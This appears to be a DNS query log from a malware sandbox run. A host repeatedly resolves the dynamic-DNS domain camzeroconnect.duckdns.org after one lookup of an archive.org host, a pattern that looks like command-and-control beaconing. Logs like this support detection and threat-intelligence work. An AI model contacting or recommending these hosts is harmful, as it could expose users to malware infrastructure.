                                                                                            Sep 27, 2024 14:00:15.814178944 CEST192.168.2.228.8.8.80x5835Standard query (0)ia601706.us.archive.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:19.993130922 CEST192.168.2.228.8.8.80xc39bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:20.993067026 CEST192.168.2.228.8.8.80xc39bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:22.007102966 CEST192.168.2.228.8.8.80xc39bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:25.475920916 CEST192.168.2.228.8.8.80xdfb9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:26.484543085 CEST192.168.2.228.8.8.80xdfb9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:27.498392105 CEST192.168.2.228.8.8.80xdfb9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:29.510925055 CEST192.168.2.228.8.8.80xdfb9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:31.620106936 CEST192.168.2.228.8.8.80x460Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:32.630737066 CEST192.168.2.228.8.8.80x460Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:33.644702911 CEST192.168.2.228.8.8.80x460Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:37.930676937 CEST192.168.2.228.8.8.80x926eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:38.933235884 CEST192.168.2.228.8.8.80x926eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:39.947252035 CEST192.168.2.228.8.8.80x926eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:41.959605932 CEST192.168.2.228.8.8.80x926eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:44.551234007 CEST192.168.2.228.8.8.80x85faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:46.985439062 CEST192.168.2.228.8.8.80x11f4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:49.933279037 CEST192.168.2.228.8.8.80x280eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:52.387089014 CEST192.168.2.228.8.8.80x3456Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:53.394454956 CEST192.168.2.228.8.8.80x3456Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:55.924626112 CEST192.168.2.228.8.8.80xf11cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:58.374610901 CEST192.168.2.228.8.8.80x2fa0Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:00.822292089 CEST192.168.2.228.8.8.80xe40dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:03.287377119 CEST192.168.2.228.8.8.80x1010Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:05.741559982 CEST192.168.2.228.8.8.80x7ef8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:08.202863932 CEST192.168.2.228.8.8.80x2219Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:10.712594986 CEST192.168.2.228.8.8.80x6f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:13.321367979 CEST192.168.2.228.8.8.80xf3eaStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:15.829636097 CEST192.168.2.228.8.8.80x4333Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:18.345551968 CEST192.168.2.228.8.8.80x1056Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:20.795851946 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:21.802154064 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:22.816242933 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:23.923522949 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:24.926367998 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.021008968 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.028477907 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.036076069 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.043359041 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.050223112 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.356870890 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.364816904 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.372700930 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.379908085 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.387646914 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:28.412928104 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:28.599522114 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:29.602075100 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:29.609379053 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:30.701396942 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.732510090 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.740382910 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.746861935 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.754096031 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:35.748786926 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.892534018 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.900552034 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.912480116 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.931924105 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.942250013 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.969182014 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.981447935 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.993057013 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:38.005044937 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:38.025048971 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.052650928 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.059912920 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.159463882 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:41.170875072 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:41.226677895 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.246937990 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.254384041 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.261765003 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.268865108 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.279783964 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.307391882 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.317064047 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.325021029 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:45.326891899 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:45.334369898 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.347330093 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.356028080 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.364794016 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.373334885 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.381865978 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.503493071 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.510829926 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.518029928 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.547816038 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.557993889 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.587002993 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.595680952 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.603790045 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.612366915 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.620038033 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.678056002 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.685261965 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.692328930 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.699428082 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.705895901 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.725100994 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.732467890 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.739761114 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.747539043 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.754782915 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:58.787954092 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:58.797257900 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.803766966 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.811193943 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.818821907 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:00.844207048 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.847588062 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.855077982 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.862596989 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.986361027 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.007808924 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.015917063 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.032572031 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.058532953 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.069828033 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.103888988 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.264270067 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.272372007 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.278930902 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.285540104 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.304923058 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.312443972 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.319197893 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.326653957 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.335335970 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:06.360479116 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.080735922 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.090181112 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.100748062 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.111489058 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:08.144737959 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.148519039 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.156084061 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.163108110 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:10.271097898 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:11.309632063 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.315011024 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.418077946 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.425460100 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.433193922 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.460370064 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.467952967 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.475203991 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.481988907 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.489409924 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.512722969 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.520304918 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.527966976 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.541131973 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.553205013 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.591377020 CEST192.168.2.228.8.8.80x60a9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.603148937 CEST192.168.2.228.8.8.80x60a9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.611131907 CEST192.168.2.228.8.8.80x60a9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.623501062 CEST192.168.2.228.8.8.80x60a9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:15.635258913 CEST192.168.2.228.8.8.80x60a9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.660229921 CEST192.168.2.228.8.8.80x95bcStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.668862104 CEST192.168.2.228.8.8.80x95bcStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.677236080 CEST192.168.2.228.8.8.80x95bcStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.693144083 CEST192.168.2.228.8.8.80x95bcStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:16.701165915 CEST192.168.2.228.8.8.80x95bcStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.717761993 CEST192.168.2.228.8.8.80x678bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.727118015 CEST192.168.2.228.8.8.80x678bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.733748913 CEST192.168.2.228.8.8.80x678bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.741048098 CEST192.168.2.228.8.8.80x678bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:17.748682976 CEST192.168.2.228.8.8.80x678bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.763149023 CEST192.168.2.228.8.8.80x82d3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.778666973 CEST192.168.2.228.8.8.80x82d3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.799525976 CEST192.168.2.228.8.8.80x82d3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.813591957 CEST192.168.2.228.8.8.80x82d3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:18.831573963 CEST192.168.2.228.8.8.80x82d3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.871073008 CEST192.168.2.228.8.8.80x863fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.879570961 CEST192.168.2.228.8.8.80x863fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.889919996 CEST192.168.2.228.8.8.80x863fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:19.920476913 CEST192.168.2.228.8.8.80x863fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
